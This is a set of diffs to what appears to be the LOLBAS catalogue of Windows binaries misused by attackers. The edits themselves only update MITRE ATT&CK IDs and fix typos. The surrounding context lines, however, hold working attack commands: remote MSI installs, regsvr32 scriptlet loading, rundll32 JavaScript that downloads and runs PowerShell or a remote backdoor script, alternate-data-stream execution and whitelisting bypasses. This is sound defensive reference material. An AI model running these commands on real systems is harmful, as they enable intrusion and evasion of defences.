-    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
+    MitreID: T1218.005
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: mshta.exe "C:\ads\file.txt:file.hta"
     Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
     Usecase: Execute code hidden in alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1170
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
+    MitreID: T1218.005
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
 Full_Path:
   - Path: C:\Windows\System32\mshta.exe

--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@@ -9,32 +9,28 @@ Commands:
     Usecase: Execute custom made msi file with attack code
     Category: Execute
     Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    MitreID: T1218.007
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
     Description: Installs the target remote & renamed .MSI file silently.
     Usecase: Execute custom made msi file with attack code from remote server
     Category: Execute
     Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    MitreID: T1218.007
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msiexec /y "C:\folder\evil.dll"
     Description: Calls DLLRegisterServer to register the target DLL.
     Usecase: Execute dll files
     Category: Execute
     Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    MitreID: T1218.007
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msiexec /z "C:\folder\evil.dll"
     Description: Calls DLLRegisterServer to un-register the target DLL.
     Usecase: Execute dll files
     Category: Execute
     Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    MitreID: T1218.007
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\msiexec.exe

--- a/yml/OSBinaries/Netsh.yml
+++ b/yml/OSBinaries/Netsh.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Proxy execution of .dll
     Category: Execute
     Privileges: User
-    MitreID: T1128
-    MitreLink: https://attack.mitre.org/techniques/T1128/
+    MitreID: T1546.007
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\WINDOWS\System32\Netsh.exe

--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: odbcconf /a {REGSVR c:\test\test.dll}
     Description: Execute DllREgisterServer from DLL specified.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\odbcconf.exe

--- a/yml/OSBinaries/OfflineScannerShell.yml
+++ b/yml/OSBinaries/OfflineScannerShell.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe

--- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml
+++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/techniques/T1105/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'

--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: pcalua.exe -a \\server\payload.dll
     Description: Open the target .DLL file with the Program Compatibilty Assistant.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
     Description: Open the target .CPL file with the Program Compatibility Assistant.
@@ -26,7 +24,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\pcalua.exe

--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@@ -9,21 +9,21 @@ Commands:
     Usecase: Proxy execution of binary
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: pcalua.exe -a \\server\payload.dll
     Description: Open the target .DLL file with the Program Compatibilty Assistant.
     Usecase: Proxy execution of remote dll file
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
     Description: Open the target .CPL file with the Program Compatibility Assistant.
     Usecase: Execution of CPL files
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\pcalua.exe

--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\pcwrun.exe

--- a/yml/OSBinaries/Pktmon.yml
+++ b/yml/OSBinaries/Pktmon.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Reconnaissance
     Privileges: Administrator
     MitreID: T1040
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1040
     OperatingSystem: Windows 10 1809 and later
   - Command: pktmon.exe filter add -p 445
     Description: Select Desired ports for packet capture
@@ -18,7 +17,6 @@ Commands:
     Category: Reconnaissance
     Privileges: Administrator
     MitreID: T1040
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1040
     OperatingSystem: Windows 10 1809 and later
 Full_Path:
   - Path: c:\windows\system32\pktmon.exe

--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@@ -1,23 +1,22 @@
 ---
 Name: Pnputil.exe
-Description: used for Install drivers.
+Description: Used for installing drivers
 Author: Hai vaknin (lux)
-Created: 25/12/2020
+Created: 2020-12-25
 Commands:
   - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
-    Description: used for Install drivers
-    Usecase: add malicious driver.
+    Description: Used for installing drivers
+    Usecase: Aadd malicious driver
     Category: Execute
     Privileges: Administrator
-    MitreID: T1215
-    MitreLink: https://attack.mitre.org/techniques/T1215
-    OperatingSystem: Windows 10,7 
+    MitreID: T1547.006
+    OperatingSystem: Windows 10,7
 Full_Path:
   - Path: C:\Windows\system32\pnputil.exe
 Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
 Acknowledgement:
-  - Person: Hai Vaknin(Lux) 
-    Handle: 'LuxNoBulIshit'
+  - Person: Hai Vaknin(Lux)
+    Handle: '@LuxNoBulIshit'
   - Person: Avihay eldad
-    Handle: 'aloneliassaf'
+    Handle: '@aloneliassaf'
 ---

--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Presentationhost.exe

--- a/yml/OSBinaries/Print.yml
+++ b/yml/OSBinaries/Print.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
     Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
@@ -18,7 +17,6 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
     Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
@@ -26,7 +24,6 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\print.exe

--- a/yml/OSBinaries/PrintBrm.yml
+++ b/yml/OSBinaries/PrintBrm.yml
@@ -10,15 +10,13 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/techniques/T1105/
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
     Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
     Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/techniques/T1096/
+    MitreID: T1564.004
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\spool\tools\PrintBrm.exe

--- a/yml/OSBinaries/Psr.yml
+++ b/yml/OSBinaries/Psr.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Reconnaissance
     Privileges: User
     MitreID: T1113
-    MitreLink: https://attack.mitre.org/techniques/T1113/
     OperatingSystem: since Windows 7 (client) / Windows 2008 R2
 Full_Path:
   - Path: c:\windows\system32\psr.exe

--- a/yml/OSBinaries/Rasautou.yml
+++ b/yml/OSBinaries/Rasautou.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User, Administrator in Windows 8
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
 Full_Path:
   - Path: C:\Windows\System32\rasautou.exe

--- a/yml/OSBinaries/Reg.yml
+++ b/yml/OSBinaries/Reg.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Hide/plant registry information in Alternate data stream for later use
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\reg.exe

--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Execute code and bypass Application whitelisting
     Category: AWL bypass
     Privileges: Local Admin
-    MitreID: T1121
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
+    MitreID: T1218.009
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regasm.exe /U AllTheThingsx64.dll
     Description: Loads the target .DLL file and executes the UnRegisterClass function.
     Usecase: Execute code and bypass Application whitelisting
     Category: Execute
     Privileges: User
-    MitreID: T1121
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
+    MitreID: T1218.009
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
@@ -32,7 +30,7 @@ Detection:
 Resources:
   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
-  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md
+  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'

--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Hide registry data in alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regedit C:\ads\file.txt:regfile.reg
     Description: Import the target .REG file into the Registry.
     Usecase: Import hidden registry data from alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\regedit.exe

--- a/yml/OSBinaries/Regini.yml
+++ b/yml/OSBinaries/Regini.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Write to registry
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\regini.exe

--- a/yml/OSBinaries/Register-cimprovider.yml
+++ b/yml/OSBinaries/Register-cimprovider.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Register-cimprovider.exe

--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Execute dll file and bypass Application whitelisting
     Category: Execute
     Privileges: Local Admin
-    MitreID: T1121
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
+    MitreID: T1218.009
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regsvcs.exe AllTheThingsx64.dll
     Description: Loads the target .DLL file and executes the RegisterClass function.
     Usecase: Execute dll file and bypass Application whitelisting
     Category: AWL bypass
     Privileges: Local Admin
-    MitreID: T1121
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
+    MitreID: T1218.009
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\regsvcs.exe
@@ -30,7 +28,7 @@ Detection:
 Resources:
   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
-  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md
+  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'

--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@@ -9,32 +9,28 @@ Commands:
     Usecase: Execute code from remote scriptlet, bypass Application whitelisting
     Category: AWL bypass
     Privileges: User
-    MitreID: T1117
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
+    MitreID: T1218.010
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
     Description: Execute the specified local .SCT script with scrobj.dll.
     Usecase: Execute code from scriptlet, bypass Application whitelisting
     Category: AWL bypass
     Privileges: User
-    MitreID: T1117
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
+    MitreID: T1218.010
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
     Description: Execute the specified remote .SCT script with scrobj.dll.
     Usecase: Execute code from remote scriptlet, bypass Application whitelisting
     Category: Execute
     Privileges: User
-    MitreID: T1117
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
+    MitreID: T1218.010
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
     Description: Execute the specified local .SCT script with scrobj.dll.
     Usecase: Execute code from scriptlet, bypass Application whitelisting
     Category: Execute
     Privileges: User
-    MitreID: T1117
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
+    MitreID: T1218.010
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\regsvr32.exe
@@ -47,7 +43,7 @@ Detection:
 Resources:
   - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
-  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md
+  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'

--- a/yml/OSBinaries/Replace.yml
+++ b/yml/OSBinaries/Replace.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
     Description: Download/Copy bar.exe to outdir
@@ -18,7 +17,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\replace.exe

--- a/yml/OSBinaries/Rpcping.yml
+++ b/yml/OSBinaries/Rpcping.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Credentials
     Privileges: User
     MitreID: T1003
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
     Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).
@@ -18,7 +17,6 @@ Commands:
     Category: Credentials
     Privileges: User
     MitreID: T1187
-    MitreLink: https://attack.mitre.org/techniques/T1187/
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\rpcping.exe

--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@@ -9,64 +9,56 @@ Commands:
     Usecase: Execute dll file
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
     Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
     Usecase: Execute DLL from SMB share.
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/techniques/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
     Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
     Usecase: Execute code from Internet
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
     Usecase: Proxy execution
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
     Usecase: Proxy execution
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
     Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
     Usecase: Execute code from Internet
     Category: Execute
     Privileges: User
-    MitreID: T1085
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    MitreID: T1218.011
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
     Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
     Usecase: Execute code from alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: rundll32.exe -sta {CLSID}
     Description: Use Rundll32.exe to load a registered or hijacked COM Server payload.  Also works with ProgID.
     Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
     Category: Execute
     Privileges: User
-    MitreID:
-    MitreLink:
+    MitreID: T1218.011
     OperatingSystem: Windows 10 (and likely previous versions)
 Full_Path:
   - Path: C:\Windows\System32\rundll32.exe

--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\runonce.exe

--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe

--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Execute binary file hidden inside an alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\sc.exe

--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1053
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1053
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\schtasks.exe

--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
     Category: Execute
     Privileges: User
-    MitreID: T1053
+    MitreID: T1053.005
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\windows\system32\schtasks.exe

--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@@ -9,11 +9,11 @@ Commands:
     Usecase: Execute binary through proxy binary to evade defensive counter measurments
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
-    Description: Executes calc.cmde from remote server
-    Usecase: Execute binary through proxy binary  from external server to evade defensive counter measurments
+    Description: Executes calc.cmd from remote server
+    Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
     Category: Execute
     Privileges: User
     MitreID: T1218

--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
     Description: Executes calc.cmde from remote server
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\scriptrunner.exe

--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@@ -6,14 +6,14 @@ Created: 2018-05-25
 Commands:
   - Command: Scriptrunner.exe -appvscript calc.exe
     Description: Executes calc.exe
-    Usecase: Execute binary through proxy binary to evade defensive counter measurments
+    Usecase: Execute binary through proxy binary to evade defensive counter measures
     Category: Execute
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
     Description: Executes calc.cmd from remote server
-    Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
+    Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
     Category: Execute
     Privileges: User
     MitreID: T1218

--- a/yml/OSBinaries/SettingSyncHost.yml
+++ b/yml/OSBinaries/SettingSyncHost.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
     OperatingSystem: Windows 8, Windows 8.1, Windows 10
   - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
     Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
     OperatingSystem: Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\SettingSyncHost.exe

--- a/yml/OSBinaries/Stordiag.yml
+++ b/yml/OSBinaries/Stordiag.yml
@@ -10,12 +10,11 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\windows\system32\stordiag.exe
   - Path: c:\windows\syswow64\stordiag.exe
-Detection: 
+Detection:
